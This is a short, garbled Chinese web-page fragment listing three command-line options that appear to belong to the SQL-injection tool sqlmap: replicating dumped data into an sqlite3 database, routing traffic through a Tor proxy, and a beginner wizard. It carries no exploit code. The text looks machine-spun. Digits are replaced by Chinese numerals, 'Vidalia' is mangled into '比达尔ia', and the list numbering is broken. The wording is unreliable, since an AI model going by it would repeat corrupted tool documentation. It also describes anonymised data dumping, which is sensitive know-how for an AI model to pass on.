  17一. –replicate 复制转储的多少到1个 sqlite三 数据库  

 172. –tor 使用默许的 Tor(比达尔ia/ Privoxy/ Polipo)代理地址  

  1. –wizard 给初级用户的简练向导分界面

相关文章

网站地图xml地图